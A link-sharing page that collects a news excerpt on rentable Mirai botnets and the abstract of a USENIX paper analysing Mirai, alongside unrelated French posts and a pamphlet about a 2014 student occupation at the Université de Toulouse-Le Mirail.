      renting the botnet does not come cheap. Customers desiring to rent the botnet must do so for a minimum of two weeks. However, clients can determine the amount of bots, the attack duration and the DDoS cool down (a term which refers to the length of time between consecutive attacks).

      [...]

      Popapret and BestBuy’s Mirai botnet is a more evolved version of the original botnet. The two hackers have added new features, such as brute-force attacks via SSH and support for exploiting zero-day vulnerabilities. According to two security researchers, going by handle 2sec4u and MalwareTech on Twitter, some of the newly created Mirai botnets can now carry out DDoS attacks by spoofing IP addresses and may also be capable of bypassing DDoS mitigation systems.

      Source:
      ▻http://www.bleepingcomputer.com/news/security/you-can-now-rent-a-mirai-botnet-of-400-000-bots

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 21/08/2017

      Understanding the Mirai Botnet

      ▻https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-antonakakis.pdf

      In this paper, we provide a seven-month retrospective analysis
      of Mirai’s growth to a peak of 600k infections and a history of its DDoS victims. By combining a variety of measurement perspectives, we analyse how the botnet emerged, what classes of devices were affected, and how Mirai variants evolved and competed for vulnerable hosts. Our measurements serve as a lens into the fragile ecosystem of IoT devices. We argue that Mirai may represent a sea change in the evolutionary development of bonnets—the simplicity through which devices were infected and its precipitous growth, demonstrate that novice malicious techniques can compromise enough low-end
      devices to threaten even some of the best-defended targets.
      To address this risk, we recommend technical and nontechnical
      interventions, as well as propose future research directions.

      #DDoS

      schrödinger @erratic
    Écrire un commentaire
  • @samizdat
    samizdat @samizdat CC BY-SA 27/09/2016

    Le conseil d’administration envahit par les personnels et étudiants de psycho. #Toulouse #Mirail ►http://fb.me/7C7V6U0O4 
    ▻https://twitter.com/RevPermanente/status/780743823974658048

    Le conseil d’administration envahit par les personnels et étudiants de psycho. #Toulouse #Mirail ►http://fb.me/7C7V6U0O4

    samizdat @samizdat CC BY-SA
    Écrire un commentaire
  • @parpaing
    parpaing @parpaing 24/11/2014
    2
    @colporteur
    @reflets
    2

    Le lien. Feuille de chou du Mirail en mouvement , un numéro 1 constitué d’un seul texte A4 recto-verso qui est une intéressante réflexion de base sur les manières de se mettre en mouvement.

    ►http://www.reporterre.net/IMG/pdf/le_lien1.pdf

    http://www.reporterre.net/local/cache-vignettes/L454xH340/zone_d_interpellation_chaleureuse_v_1-e374d.jpg http://www.reporterre.net/local/cache-vignettes/L400xH300/arton6591-6b6e4.jpg

    (Découvert à partir de l’article < À l’université de Toulouse, un campement contre le barrage de Sivens et les violences de l’Etat > ▻http://www.reporterre.net/spip.php?article6591 )

    #testet #toulouse #revue

    • #Toulouse
    parpaing @parpaing
    • @parpaing
      parpaing @parpaing 24/11/2014

      Depuis deux semaines, on a pu entendre à
      répétition « quel est le lien entre le barrage de
      Sivens, les violences policières et les
      conditions d’étude ? ». Le slogan « Du fric
      pour les facs, les lycées et la biodiversité, pas
      pour la police et l’armée » avait au moins le
      mérite, avouons le, de tenter d’apporter une
      réponse à cette question en créant un lien entre
      les trois thèmes : l’argent. Il en faudrait plus
      pour certaines choses et moins pour d’autres.
      Si nous faisons face à des problèmes sociaux,
      environnementaux, politiques etc la solution
      serait d’avoir plus d’argent ou tout du moins
      une meilleure distribution de celui-ci.

      Partons du postulat inverse : l’argent n’est pas la
      solution mais un des problèmes. Le lien entre
      tout ça, mais aussi entre bien d’autres choses,
      c’est la transformation en produit de tous les
      aspects de nos existences et l’expropriation qui
      l’accompagne. L’économique a envahi nos
      existence et nous en a dépossédé. De
      l’enseignement à la « gestion de la nature » en
      passant par la sécurité, les espaces, les
      déplacements, les relations, la culture, les
      opinions etc il n’est pas une dimension qui
      échappe à cette subordination à la logique
      économique. Si bien que plus aucune d’entre
      elles ne semble être notre, si bien que nous en
      sommes réduit à les consommer tandis que
      d’autres les gèrent pour nous, tandis que
      d’autres gèrent nos existences.
      Ainsi, l’enjeu ne serait pas une potentielle
      augmentation des budgets alloués aux facs et à
      la biodiversité mais belle et bien une
      réappropriation des différentes dimensions de
      nos existences, à commencer, pour les
      étudiants, par leur facs.

      parpaing @parpaing
    • @parpaing
      parpaing @parpaing 24/11/2014

      Il est temps d’arrêter de demander naïvement à
      nos dirigeants – pardon, à nos représentants -
      de bien vouloir respecter notre volonté et de ne
      pas nous imposer la leur, de bien vouloir nous
      redonner ce qu’ils nous ont pris.

      parpaing @parpaing
    • @parpaing
      parpaing @parpaing 24/11/2014

      Occuper un espace c’est se le réapproprier,
      c’est le faire notre et y développer une vie
      collective. Occuper c’est avant tout se
      rencontrer et tisser des liens entre ce qui n’était
      auparavant qu’isolement et inconnu. Occuper
      c’est prendre en main nos besoins et
      réorganiser ensemble nos existences au sein
      d’un ensemble, pas forcément homogène mais
      solidaire.

      L’occupation est l’ancrage de la lutte dans la
      quotidienneté. C’est une lutte permanente qui
      ne s’arrête pas à un moment donné de la
      journée contrairement à la manifestation qui,
      elle, commence et se termine à une heure
      précise. Occuper c’est donc aussi se donner le
      temps nécessaire à toute élaboration d’une lutte
      à travers des discutions, réflexions, débats et
      même engueulade.

      L’occupation n’est pas une demande tournée
      vers des dirigeants, c’est une affirmation de
      notre capacité à nous organiser sans eux.
      Occupons cette fac, réapproprions nous notre
      fac. Mangeons-y, dormons-y, vivons-y
      ensemble, afin de nous donner le temps de
      mettre en place, d’une part, des moyens de
      nous opposer à ceux qui nous imposent leurs
      vues, et d’autre part des moyens de reprendre
      en main nos existences.

      parpaing @parpaing
    • @parpaing
      parpaing @parpaing 24/11/2014

      <Jeudi 20 novembre, premier blocage du campus, 1500 étudiants en AG, et manifestation en centre-ville : Avanti le #Mirail !>
      ▻http://www.ccr4.org/Jeudi-20-novembre-premier-blocage-du-campus-1500-etudiants-en-AG-et-manifestat

      Après une AG à 1200 le jeudi 13, ce sont environ 1500 étudiants qui ont voté, hier, après un premier blocage de l’université, un nouveau blocage avec occupation pour le mardi 25. Premier test, premier électrochoc : personnels et étudiants forcés de discuter entre eux, à côté d’une micro-ZAD symbolique plantée sur le jardin central du campus.

      parpaing @parpaing
    • @parpaing
      parpaing @parpaing 24/11/2014

      Et pour plus d’info sur le mouvement à Toulouse, c’est par là : ►http://iaata.info

      Et là on a un aggrégateur qui réunit Toulouse, Paris, Tours et Rebellyon :
      ►http://mutu.mediaslibres.org

      parpaing @parpaing
    • @parpaing
      parpaing @parpaing 25/11/2014

      Le comité de mobilisation de l’université de Toulouse - le Mirail a créé un journal pour informer sur leur lutte... Le numéro 1 du lundi 24 novembre...
      ▻http://iaata.info/Direct-lutte-le-journal-des-435.html

      http://iaata.info/chroot/mediaslibres/ml-toulouse/ml-toulouse/public_html/IMG/png/direct_lutte1p1.png http://iaata.info/chroot/mediaslibres/ml-toulouse/ml-toulouse/public_html/IMG/png/direct_lutte1p2.png

      parpaing @parpaing
    Écrire un commentaire

Thèmes liés

  • #mirai
  • #ddos
  • #malware
  • #hacking
  • #botnet
  • continent: europe
  • company: akamai
  • country: germany
  • technology: udp
  • technology: dns
  • #dyn
  • #dns
  • #mirail
  • #akamai
  • country: united kingdom